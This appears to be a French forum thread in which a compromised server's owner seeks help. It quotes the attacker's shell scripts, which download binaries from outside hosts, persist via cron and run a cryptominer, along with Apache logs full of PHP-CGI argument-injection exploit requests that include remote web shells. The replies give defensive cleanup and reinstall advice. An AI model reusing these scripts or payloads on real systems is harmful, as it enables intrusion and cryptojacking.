Aide contre "Hancking attack"

bonjour tous le monde
j’ai eu un attaque de hackers sur mon site web,dont voice le code

[code]#[color=#0000FF]!/bin/sh
crontab -r
cd /tmp
rm -rf a* c* update*
pwd > mech.dir
dir=$(cat mech.dir)
echo “* * * * * $dir/update >/dev/null 2>&1” > cron.d
crontab cron.d
crontab -l | grep update
wget http://europay24.info/update >> /dev/null &&
chmod u+x update
rm -rf /etc/cron.hourly/update

cp update /etc/cron.hourly/
chattr -ia bash
chattr -ia *
wget http://europay24.info/clamav
wget http://europay24.info/sh
chmod +x sh
chmod +x clamav
mv clamav bash
kill -9 ps x|grep miner|grep -v grep|awk '{print $1}'
kill -9 ps x|grep stratum|grep -v grep|awk '{print $1}'
PATH="." bash -o stratum+tcp://216.230.103.42:3333 -O geox.1:x -B
PATH="." sh -o stratum+tcp://216.230.103.42:3333 -O geox.1:x -B
chattr +ia bash
chattr +ia sh[/color]
[/code]
alors
comment supprimer cet attaque sur mon serveur

logiciel installer : apache2, mysql 5, phpmyadmin

Si un attaquant s’est introduit aussi loin dans ton système (pour faire tout ça il a besoin d’être root) alors ta machine est trop compromise pour être rattrapable.
Même si tu nettoyais tout ce que tu trouves, rien ne garantit que tu nettoierais réellement tout.

Ça va pas te plaire, mais machine compromise = sauvegarde des données importantes, formatage complet et réinstallation. Avant de faire tout ça par contre, il serait utile que tu identifies la faille que l’attaquant a utilisée pour rentrer, histoire que ça se reproduise pas sur ta nouvelle installation…

  1. Dans /tmp tu dois avoir des fichiers
    update, bash, clamav et sh. Regarde leur propriétaire et déplace les

  2. Tu dois avoir un script /etc/cron.hourly/update douteux.
    Déplace le ailleurs et donne le contenu de ce script.

  3. Regarde également le résultat de
    crontab -l
    lorsque tu es le propriétaire des fichiers /tmp/update (cf 1)

  4. Fais un test d’intégrité sur la machine. Pour cela installe debsums et lance le

  5. Si c’est un serveur sensible, réinstalle le, ci dessus c’est essentiellement pour apprendre. Il te faut également regarder les logs et historique des commandes, vérifier les bases de données, vérifier chacun des processus courants, tester d’éventuels processus cachés et tester la présence d’un rootkit. Bref y’a du boulot.

Edit: Syam, oui mais si le serveur ne doit pas être arrêter ou tout simplement si il n’est pas ultra sensible et pour apprendre, essayer de rattraper les choses peut apprendre beaucoup.

En préalable à la méthode pédagogique de fran.b : changer le mot de passe root et/ou des utilisateurs sudoers. Utiliser un mot de passe robuste.

Pour chercher des rootkits, rkhunter pourrait être pas mal. Sinon +1 à fran.b, l’analyse du fonctionnement du script est une bonne piste pour savoir ce que le bousin fait.

Identifier le moyen qui a permis d’accéder à la machine de la sorte pourrait être pas mal. Accès ssh autorisé à root + mot de passe faible ? J’y connais pas grand chose, mais fail2ban peut aider à contrer les attaques par force brute.

Sans doute via le site web, les fichiers sous /tmp devraient appartenir à www-data.

Le chattr +ia empêche toute modification et effacement de ces fichiers qui doivent se retrouver sous /tmp après le boot.

bonjour a tous
merci pour votre réponses, veuillez m’excusé pour la réponse tardive.
je tant plutôt de réparer mon serveur avant de le formaté parce 'il y a beaucoup de logiciel installé notamment GAMMU

[quote]1) Dans /tmp tu dois avoir des fichiers
update, bash, clamav et sh. Regarde leur propriétaire et déplace les[/quote]
il n’y a pas de ces fichier dans /tmp, par contre ni ailleurs le hackers a déjà supprimer

[quote]cd /tmp
rm -rf a* c* update*[/quote]
par contre il y a ces fichier dans /www
mech.dir

update

[quote]#!/bin/sh
plm=ps x|grep mine.cc.st:3333|grep -v grep|awk '{print $7}'
if [ “$plm” != “” ]
then echo "MERGE!!!"
else
nohup wget 82.165.130.162/a && sh a >> /dev/null &
fi
[/quote]
cron.d

[quote]* * * * * /var/www/update >/dev/null 2>&1
[/quote]
et le fichier bash en pj

[quote]/etc/cron.hourly[/quote] est vide

syam d’après mes recherches la faille était dans cgi-bincgi-bin

extrait des fichier log

apache/access.log

81.2.197.141 - - [18/Nov/2013:14:39:17 +0300] “POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 200 301 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
2.100.158.26 - - [18/Nov/2013:15:55:07 +0300] “9\xd2\t\x91\xfb\xa4\t\x05\xf3N*\xeeVs\xbc)\xa5(\x89lRgp\xa3\x0e” 400 506 “-” "-"
5.15.26.215 - - [18/Nov/2013:19:43:57 +0300] “m\b\x9aP\xd9\x16\xb8n\xe5%{\xd50\xf4\x1e\x94/2\xf8\x8e\xe8\xfdI\xad\xb6\x89L\xcd\x93\x94\xbe5n\x03\xe9K” 200 1397 “-” "-"
94.102.63.245 - - [19/Nov/2013:00:46:58 +0300] “GET /cgi-bin/php HTTP/1.0” 500 829 “-” “-”

82.221.102.181 - - [21/Nov/2013:17:33:35 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1 " 500 229 “-” "curl/7.32.0"
82.221.102.181 - - [21/Nov/2013:17:34:46 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1 " 500 229 “-” "curl/7.32.0"
82.221.102.181 - - [21/Nov/2013:17:39:01 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1 " 200 10338 “-” "curl/7.32.0"
82.221.102.181 - - [21/Nov/2013:17:41:22 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1 " 500 229 “-” "curl/7.32.0"
82.221.102.181 - - [21/Nov/2013:17:46:00 +0300] “GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.0” 500 229 “-” "-"
82.221.102.181 - - [21/Nov/2013:17:47:48 +0300] “GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.0” 500 229 “-” "-"
82.221.102.181 - - [21/Nov/2013:17:48:49 +0300] “GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.0” 500 229 “-” "-"
82.221.102.181 - - [21/Nov/2013:18:31:31 +0300] “GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1” 200 10341 “-” "curl/7.32.0"
94.102.56.237 - - [22/Nov/2013:00:15:52 +0300] “GET /cgi-php HTTP/1.0” 404 483 “-” "-"
94.102.56.237 - - [22/Nov/2013:00:48:51 +0300] “GET /cgi-php5 HTTP/1.0” 404 484 “-” "-"
50.116.50.35 - - [22/Nov/2013:00:44:26 +0300] “POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1” 504 508 “-” "-"
94.102.56.237 - - [22/Nov/2013:01:22:08 +0300] “GET /cgi-php4 HTTP/1.0” 404 484 “-” "-"
80.28.121.52 - - [22/Nov/2013:02:19:20 +0300] “HEAD / HTTP/1.0” 200 386 “-” "-"
80.28.121.52 - - [22/Nov/2013:02:19:20 +0300] “POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 500 833 “-” “Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25”

80.28.121.52 - - [22/Nov/2013:02:21:13 +0300] “POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 500 833 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
80.28.121.52 - - [22/Nov/2013:02:21:17 +0300] “POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 404 495 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
80.28.121.52 - - [22/Nov/2013:02:21:18 +0300] “POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 404 495 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
80.28.121.52 - - [22/Nov/2013:02:21:19 +0300] “POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 404 492 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
189.36.12.66 - - [22/Nov/2013:03:30:47 +0300] “GET /manager/html HTTP/1.1” 404 504 “-” "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
94.102.56.237 - - [22/Nov/2013:04:31:57 +0300] “GET /cgi-bin/php HTTP/1.0” 500 829 “-” "-"
94.102.56.237 - - [22/Nov/2013:05:05:03 +0300] “GET /cgi-bin/php5 HTTP/1.0” 500 829 “-” "-"
94.102.56.237 - - [22/Nov/2013:05:38:07 +0300] “GET /cgi-bin/php4 HTTP/1.0” 404 488 “-” "-"
1.234.31.127 - - [22/Nov/2013:06:40:17 +0300] “HEAD / HTTP/1.0” 200 386 “-” "-"
1.234.31.127 - - [22/Nov/2013:06:40:18 +0300] “POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 504 538 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
1.234.31.127 - - [22/Nov/2013:06:50:22 +0300] “POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 504 538 “-” “Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25”

94.102.56.237 - - [22/Nov/2013:12:45:24 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin1.448420E-316simulation%3Don±d+disable_functions%3D±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp0X0.07FFFEF42B6AP-10220.0000000.000000192.151.144.2340.000000lurk.txt±d+cgi1.020451E-314force_redirect%3D0±d+cgi1.396073E-316redirect_status_env%3D0±n HTTP/1.0” 500 829 “-” "-"
94.102.56.237 - - [22/Nov/2013:12:47:56 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin2.260321E-316simulation%3Don±d+disable_functions%3D±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp0X0.07FFF142588DP-10220.0000000.000000192.151.144.2340.000000lurk.txt±d+cgi1.020451E-314force_redirect%3D0±d+cgi2.239255E-316redirect_status_env%3D0±n HTTP/1.0\r\n\r\n” 500 829 “-” "-"
210.245.23.136 - - [22/Nov/2013:16:12:19 +0300] “HEAD / HTTP/1.0” 200 386 “-” "-"
210.245.23.136 - - [22/Nov/2013:16:12:20 +0300] “POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 500 833 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
210.245.23.136 - - [22/Nov/2013:16:16:59 +0300] “POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 504 538 “-” “Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25”

210.245.23.136 - - [22/Nov/2013:16:27:07 +0300] “POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 404 495 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
210.245.23.136 - - [22/Nov/2013:16:27:09 +0300] “POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 404 492 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
94.102.56.237 - - [22/Nov/2013:17:47:29 +0300] “GET /cgi-bin/php HTTP/1.0” 500 829 “-” "-"
80.82.78.9 - - [22/Nov/2013:17:57:23 +0300] “POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1” 200 325 “-” "-"
219.136.138.69 - - [22/Nov/2013:18:33:38 +0300] “\x81\xc1\x90J\xa9A\x96\xf5\xf0\x1f&\xca<\xb0_\xf1\x0f\x03\x9fJ\x93\xa8\xd7\x1f\xcb\xe7L\xdcM\xbe\xb8\xaa\xa4r\x83\xf1*\xf0=\xf5\x8b\x8f\xe3\xa6yY\xbd\x03\x94\xc5\xba&-\xf7” 200 1397 “-” "-"
80.82.78.9 - - [22/Nov/2013:18:52:30 +0300] “POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1” 200 3784 “-” "-"
94.102.56.237 - - [22/Nov/2013:18:54:21 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 336 “-” "-"
